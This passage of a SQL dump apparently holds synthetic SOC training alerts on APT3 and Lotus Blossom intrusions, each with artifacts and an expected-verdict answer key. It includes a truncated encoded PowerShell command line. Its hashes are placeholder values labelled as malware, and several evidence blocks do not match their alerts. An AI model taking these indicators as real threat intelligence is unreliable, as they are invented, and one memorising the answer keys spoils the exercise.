host.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(1227, 'Pirpi Malware Persistence Mechanism', 'high', 'Host-based Intrusion Prevention System (HIPS)', 'APT3 has deployed the Pirpi malware to maintain persistence within the network. The malware was detected using a known persistence mechanism involving specific registry modifications and a malicious executable file. Immediate action is needed to prevent further compromise.', 'Persistence', 'T1547.001', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-12T14:23:45Z\",\"event_id\":\"HIPS_ALERT_5872\",\"source_ip\":\"192.168.15.22\",\"detected_file\":\"C:\\\\Windows\\\\System32\\\\pirpi_service.exe\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"registry_change\":{\"key\":\"HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\",\"value_name\":\"PirpiService\",\"value_data\":\"\\\"C:\\\\Windows\\\\System32\\\\pirpi_service.exe\\\"\"},\"attacker_ip\":\"203.0.113.45\",\"username\":\"compromised_user\"}', '2026-02-07 21:29:13', '2026-02-19 15:49:29', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.15.22\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal host suspected to be compromised.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intel\",\"verdict\":\"malicious\",\"details\":\"Known IP associated with APT3 activities.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware_db\",\"verdict\":\"malicious\",\"details\":\"Hash corresponds to Pirpi malware executable.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"compromised_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_audit\",\"verdict\":\"suspicious\",\"details\":\"User account suspected to be compromised.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-08T19:00:02.559Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch.\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"event_id\\\":\\\"HIPS_ALERT_5872\\\",\\\"source_ip\\\":\\\"192.168.15.22\\\",\\\"detected_file\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\pirpi_service.exe\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"registry_change\\\":{\\\"key\\\":\\\"HKLM\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"value_name\\\":\\\"PirpiService\\\",\\\"value_data\\\":\\\"\\\\\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\pirpi_service.exe\\\\\\\"\\\"},\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"compromised_user\\\"}\"},{\"timestamp\":\"2026-02-08T18:59:02.559Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"event_id\\\":\\\"HIPS_ALERT_5872\\\",\\\"source_ip\\\":\\\"192.168.15.22\\\",\\\"detected_file\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\pirpi_service.exe\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"registry_change\\\":{\\\"key\\\":\\\"HKLM\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"value_name\\\":\\\"PirpiService\\\",\\\"value_data\\\":\\\"\\\\\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\pirpi_service.exe\\\\\\\"\\\"},\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"compromised_user\\\"}\"},{\"timestamp\":\"2026-02-08T18:58:02.559Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"event_id\\\":\\\"HIPS_ALERT_5872\\\",\\\"source_ip\\\":\\\"192.168.15.22\\\",\\\"detected_file\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\pirpi_service.exe\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"registry_change\\\":{\\\"key\\\":\\\"HKLM\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"value_name\\\":\\\"PirpiService\\\",\\\"value_data\\\":\\\"\\\\\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\pirpi_service.exe\\\\\\\"\\\"},\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"compromised_user\\\"}\"},{\"timestamp\":\"2026-02-08T18:57:02.559Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"event_id\\\":\\\"HIPS_ALERT_5872\\\",\\\"source_ip\\\":\\\"192.168.15.22\\\",\\\"detected_file\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\pirpi_service.exe\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"registry_change\\\":{\\\"key\\\":\\\"HKLM\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"value_name\\\":\\\"PirpiService\\\",\\\"value_data\\\":\\\"\\\\\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\pirpi_service.exe\\\\\\\"\\\"},\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"compromised_user\\\"}\"},{\"timestamp\":\"2026-02-08T18:56:02.559Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"event_id\\\":\\\"HIPS_ALERT_5872\\\",\\\"source_ip\\\":\\\"192.168.15.22\\\",\\\"detected_file\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\pirpi_service.exe\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"registry_change\\\":{\\\"key\\\":\\\"HKLM\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"value_name\\\":\\\"PirpiService\\\",\\\"value_data\\\":\\\"\\\\\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\pirpi_service.exe\\\\\\\"\\\"},\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"compromised_user\\\"}\"}],\"query\":\"index=main source=\\\"/var/ossec/logs/alerts/alerts.json\\\" | head 100\"}}', 0),
(1228, 'Lateral Movement via Windows Exploit', 'high', 'Network Traffic Analysis Tool', 'APT3 exploited a Windows zero-day vulnerability to move laterally within the network, targeting internal systems. The attack was detected through abnormal network traffic originating from an external IP address known for malicious activities.', 'Lateral Movement', 'T1570: Lateral Tool Transfer', 1, 'resolved', NULL, '{\"timestamp\":\"2023-11-02T14:23:45Z\",\"src_ip\":\"203.0.113.45\",\"dest_ip\":\"192.168.1.15\",\"protocol\":\"SMB\",\"action\":\"Exploit Attempt\",\"exploit_name\":\"Windows-ZeroDay-2023\",\"associated_file\":\"APT3_toolkit_v2.exe\",\"file_hash\":\"5d41402abc4b2a76b9719d911017c592\",\"username\":\"jdoe\",\"process_name\":\"svchost.exe\",\"alert_id\":\"LM-20231102-01\"}', '2026-02-07 21:29:13', '2026-02-19 15:48:42', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP associated with APT3 activities\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal host targeted for lateral movement\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"5d41402abc4b2a76b9719d911017c592\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Known APT3 malware hash\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"APT3_toolkit_v2.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"File associated with APT3 toolkit\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'intermediate', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1229, 'Data Exfiltration Detected', 'high', 'Data Loss Prevention (DLP) System', 'The final stage of APT3\'s operation involves exfiltrating critical data, utilizing encrypted channels to evade detection and complete their mission.', 'Exfiltration', 'T1048.003: Exfiltration Over Alternative Protocol', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-12T14:23:45Z\",\"event_id\":\"DLP-EXF-987654\",\"src_ip\":\"192.168.1.45\",\"dst_ip\":\"203.0.113.45\",\"username\":\"jdoe\",\"filename\":\"financial_report_2023.xlsx\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"protocol\":\"HTTPS\",\"action\":\"exfiltration\",\"status\":\"blocked\",\"malware_name\":\"APT3_ExfilTool\",\"channel_encryption\":\"TLS 1.2\"}', '2026-02-07 21:29:13', '2026-02-19 15:49:42', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal monitoring\",\"verdict\":\"internal\",\"details\":\"Internal IP address of compromised host\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat intelligence\",\"verdict\":\"malicious\",\"details\":\"Known IP address associated with APT3\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"financial_report_2023.xlsx\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal monitoring\",\"verdict\":\"suspicious\",\"details\":\"Sensitive file targeted for exfiltration\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware analysis\",\"verdict\":\"malicious\",\"details\":\"File hash associated with APT3\'s exfiltration tool\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'intermediate', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-08T19:00:02.562Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"event_id\\\":\\\"DLP-EXF-987654\\\",\\\"src_ip\\\":\\\"192.168.1.45\\\",\\\"dst_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"financial_report_2023.xlsx\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action\\\":\\\"exfiltration\\\",\\\"status\\\":\\\"blocked\\\",\\\"malware_name\\\":\\\"APT3_ExfilTool\\\",\\\"channel_encryption\\\":\\\"TLS 1.2\\\"}\"},{\"timestamp\":\"2026-02-08T18:59:02.562Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"event_id\\\":\\\"DLP-EXF-987654\\\",\\\"src_ip\\\":\\\"192.168.1.45\\\",\\\"dst_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"financial_report_2023.xlsx\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action\\\":\\\"exfiltration\\\",\\\"status\\\":\\\"blocked\\\",\\\"malware_name\\\":\\\"APT3_ExfilTool\\\",\\\"channel_encryption\\\":\\\"TLS 1.2\\\"}\"},{\"timestamp\":\"2026-02-08T18:58:02.562Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"event_id\\\":\\\"DLP-EXF-987654\\\",\\\"src_ip\\\":\\\"192.168.1.45\\\",\\\"dst_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"financial_report_2023.xlsx\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action\\\":\\\"exfiltration\\\",\\\"status\\\":\\\"blocked\\\",\\\"malware_name\\\":\\\"APT3_ExfilTool\\\",\\\"channel_encryption\\\":\\\"TLS 1.2\\\"}\"},{\"timestamp\":\"2026-02-08T18:57:02.562Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"event_id\\\":\\\"DLP-EXF-987654\\\",\\\"src_ip\\\":\\\"192.168.1.45\\\",\\\"dst_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"financial_report_2023.xlsx\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action\\\":\\\"exfiltration\\\",\\\"status\\\":\\\"blocked\\\",\\\"malware_name\\\":\\\"APT3_ExfilTool\\\",\\\"channel_encryption\\\":\\\"TLS 1.2\\\"}\"},{\"timestamp\":\"2026-02-08T18:56:02.562Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"event_id\\\":\\\"DLP-EXF-987654\\\",\\\"src_ip\\\":\\\"192.168.1.45\\\",\\\"dst_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"financial_report_2023.xlsx\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action\\\":\\\"exfiltration\\\",\\\"status\\\":\\\"blocked\\\",\\\"malware_name\\\":\\\"APT3_ExfilTool\\\",\\\"channel_encryption\\\":\\\"TLS 1.2\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1230, 'Spear Phishing Email with Malicious Attachment', 'high', 'Email Gateway Logs', 'A spear phishing email was detected targeting Philippine military personnel. The email contained a malicious attachment aimed at deploying the Elise backdoor.', 'Initial Access', 'T1566.001', 1, 'resolved', NULL, '{\"timestamp\":\"2023-09-15T08:42:59Z\",\"email_id\":\"2023-09-15-0001\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.12.34.56\",\"email_subject\":\"Urgent: Updated Defense Protocols\",\"sender_email\":\"trusted.contact@military-gov.ph\",\"recipient_email\":\"j.doe@military.ph\",\"attachment_name\":\"Defense_Update_2023.pdf.exe\",\"attachment_hash\":\"5f4dcc3b5aa765d61d8327deb882cf99\",\"malware_name\":\"Elise\",\"malware_family\":\"Lotus Blossom\",\"detection_method\":\"Attachment Analysis\",\"action_taken\":\"Quarantined\"}', '2026-02-07 21:48:01', '2026-02-19 15:47:32', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known APT infrastructure associated with Lotus Blossom.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.12.34.56\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of targeted system.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"5f4dcc3b5aa765d61d8327deb882cf99\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with Elise malware.\"}},{\"id\":\"artifact_4\",\"type\":\"email\",\"value\":\"trusted.contact@military-gov.ph\",\"is_critical\":false,\"osint_result\":{\"source\":\"Email Reputation\",\"verdict\":\"suspicious\",\"details\":\"Email address spoofing legitimate organization.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"Defense_Update_2023.pdf.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Attachment Analysis\",\"verdict\":\"malicious\",\"details\":\"Executable disguised as a PDF file.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'advanced', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Spear Phishing Email with Malicious Attachment\",\"date\":\"2026-02-08T19:00:02.564Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(1231, 'Execution of Elise Backdoor', 'high', 'Endpoint Detection and Response (EDR) Alerts', 'Upon opening the attachment, the Elise backdoor is executed, establishing a covert channel for remote control by the attackers.', 'Execution', 'T1059.001', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-12T14:32:00Z\",\"event_id\":\"EDR-22345\",\"hostname\":\"workstation-12\",\"username\":\"jdoe\",\"process_id\":4567,\"process_name\":\"elise_loader.exe\",\"file_path\":\"C:\\\\Users\\\\jdoe\\\\AppData\\\\Local\\\\Temp\\\\elise_loader.exe\",\"file_hash\":\"b1946ac92492d2347c6235b4d2611184\",\"source_ip\":\"10.0.0.25\",\"destination_ip\":\"203.0.113.56\",\"destination_port\":443,\"protocol\":\"HTTPS\",\"action\":\"Executed\",\"malicious\":true}', '2026-02-07 21:48:01', '2026-02-19 15:47:46', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.56\",\"is_critical\":true,\"osint_result\":{\"source\":\"ThreatIntelDB\",\"verdict\":\"malicious\",\"details\":\"Known C2 server associated with Elise backdoor.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"b1946ac92492d2347c6235b4d2611184\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Identified as Elise backdoor loader.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"elise_loader.exe\",\"is_critical\":false,\"osint_result\":{\"source\":\"FileNameDB\",\"verdict\":\"suspicious\",\"details\":\"Commonly used by malware for execution.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'advanced', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(1232, 'Establishing Persistence Mechanism', 'high', 'Registry Change Logs', 'Lotus Blossom modifies system registry keys to maintain persistence, allowing the Elise backdoor to survive system reboots and user logouts.', 'Persistence', 'T1547.001', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-04T14:22:35Z\",\"event_id\":\"4720\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.0.0.23\",\"user\":\"compromised_user\",\"registry_key\":\"HKEY_LOCAL_MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\Elise\",\"file_path\":\"C:\\\\Users\\\\Public\\\\Elise\\\\elise.exe\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"action\":\"Modify\",\"description\":\"Registry key modified to run Elise backdoor on startup.\",\"user_sid\":\"S-1-5-21-3623811015-3361044348-30300820-1013\"}', '2026-02-07 21:48:01', '2026-02-19 15:48:03', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"Known Lotus Blossom command and control server.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.23\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal company server.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"C:\\\\Users\\\\Public\\\\Elise\\\\elise.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Elise backdoor executable.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hash Lookup\",\"verdict\":\"malicious\",\"details\":\"Hash associated with Elise backdoor.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'advanced', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-08T19:00:02.566Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-04T14:22:35Z\\\",\\\"event_id\\\":\\\"4720\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.0.0.23\\\",\\\"user\\\":\\\"compromised_user\\\",\\\"registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\Elise\\\",\\\"file_path\\\":\\\"C:\\\\\\\\Users\\\\\\\\Public\\\\\\\\Elise\\\\\\\\elise.exe\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"action\\\":\\\"Modify\\\",\\\"description\\\":\\\"Registry key modified to run Elise backdoor on startup.\\\",\\\"user_sid\\\":\\\"S-1-5-21-3623811015-3361044348-30300820-1013\\\"}\"},{\"timestamp\":\"2026-02-08T18:59:02.566Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-04T14:22:35Z\\\",\\\"event_id\\\":\\\"4720\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.0.0.23\\\",\\\"user\\\":\\\"compromised_user\\\",\\\"registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\Elise\\\",\\\"file_path\\\":\\\"C:\\\\\\\\Users\\\\\\\\Public\\\\\\\\Elise\\\\\\\\elise.exe\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"action\\\":\\\"Modify\\\",\\\"description\\\":\\\"Registry key modified to run Elise backdoor on startup.\\\",\\\"user_sid\\\":\\\"S-1-5-21-3623811015-3361044348-30300820-1013\\\"}\"},{\"timestamp\":\"2026-02-08T18:58:02.566Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 